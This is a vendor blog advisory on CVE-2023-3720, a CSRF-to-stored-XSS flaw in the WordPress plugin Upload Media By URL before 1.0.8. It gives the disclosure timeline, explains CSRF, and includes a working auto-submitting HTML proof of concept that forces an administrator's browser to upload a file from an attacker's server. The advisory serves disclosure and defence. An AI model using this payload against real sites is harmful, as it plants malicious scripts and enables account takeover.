Site icon CleanTalk's blog

CVE-2023-3720 – Upload Media By URL < 1.0.8 - Stored XSS via CSRF

During a thorough security assessment of the Upload Media By URL plugin for WordPress, a concerning medium-level vulnerability has been uncovered in versions prior to 1.0.8. This vulnerability poses a significant risk to your website’s security and calls for immediate action! If exploited, this vulnerability allows attackers to potentially upload files containing malicious code directly to your WordPress site, exposing your users to harmful scripts and attacks.

Main info:

CVECVE-2023-3720
PluginUpload Media By URL
CriticalMedium
Publicly PublishedAugust 2, 2023
Last UpdatedAugust 2, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A2: Broken Authentication and Session Management
PoCYes
ExploitWill be later
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3720
https://wpscan.com/vulnerability/16375a7f-0a9f-4961-8510-d047ffbf3954
Plugin Security Certification by CleanTalk

Timeline

July 10, 2023Plugin testing and vulnerability detection in the Upload Media By URL plugin have been completed
July 10, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
July 17, 2023The author has eliminated the vulnerability and patched his plugin
August 2, 2023Registered CVE-2023-3720

Discovery of the Vulnerability

During a security assessment of the Upload Media By URL plugin for WordPress, a medium vulnerability was identified in versions prior to 1.0.8. The plugin lacked Cross-Site Request Forgery (CSRF) protection when handling file uploads, allowing attackers to trick logged-in administrators into uploading files on their behalf, including HTML files containing malicious JavaScript code that could execute when accessed by users with the unfiltered_html capability.

Understanding Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) is an attack that forces an authenticated user to execute unwanted actions on a web application without their knowledge or consent. In this case, attackers can exploit the absence of CSRF protection in the Upload Media By URL plugin to create a crafted HTML file hosted on an external server. If a privileged user, such as an administrator, unknowingly accesses the external link, the malicious HTML file can trigger the upload of harmful files onto the WordPress system.

Exploiting the Cross-Site Request Forgery (CSRF) vulnerability

By crafting a malicious HTML file that includes a CSRF payload, attackers can entice administrators with upload privileges to visit the external link. Once the link is accessed, the malicious file exploits the lack of CSRF protection in the plugin to perform unauthorized actions, effectively tricking the administrator into uploading harmful files to the WordPress site.

POC code:

<html>

  <body>

  <script>history.pushState(”, ”, ‘/’)</script>

    <form action=”http://your_site/wordpress/wp-admin/upload.php” method=”POST” enctype=”multipart/form-data”>

      <input type=”hidden” name=”multiurl” value=”http://your_external_server/123.html” />

      <input type=”submit” value=”Submit request” />

    </form>

    <script>

      document.forms[0].submit();

    </script>

  </body>

</html>

Potential Risks and Real-World Impact

The CSRF vulnerability in the Upload Media By URL plugin poses severe risks to website administrators and users alike. Beyond the technical implications, it also serves as a potential tool for social engineering attacks. Real-world scenarios include:

  1. Stored Cross-Site Scripting (XSS) Attacks::
    Attackers could upload HTML files containing embedded XSS payloads, compromising the security and privacy of users accessing the affected pages, and potentially exposing sensitive data or credentials.In almost all cases , Stored XSS is used to steal cookies , thereby Account Takeover.
  2. Malware Distribution:
    Malicious files, such as infected scripts or executables, could be uploaded, leading to the dissemination of malware among website visitors or affecting the overall integrity of the website.
  3. Unauthorized Content Injection:
    Attackers might use this vulnerability to inject unauthorized content into the website, damaging the site’s reputation, or defacing it with inappropriate or harmful materials.
  4. Social Engineering Exploits:
    Since the plugin allows the upload of files, attackers could craft seemingly innocent files (e.g., images, documents) with misleading names or enticing content to lure unsuspecting users into downloading or opening the files, facilitating social engineering attacks.

Recommendations for Improved Security

To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

By addressing the CSRF vulnerability in the Upload Media By URL plugin and implementing these security recommendations, website owners can significantly reduce the likelihood of security breaches, protect their site’s integrity, and safeguard against social engineering exploits.

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


Check my website

CVE-2023-3720 – Upload Media By URL < 1.0.8 - Stored XSS via CSRF
Exit mobile version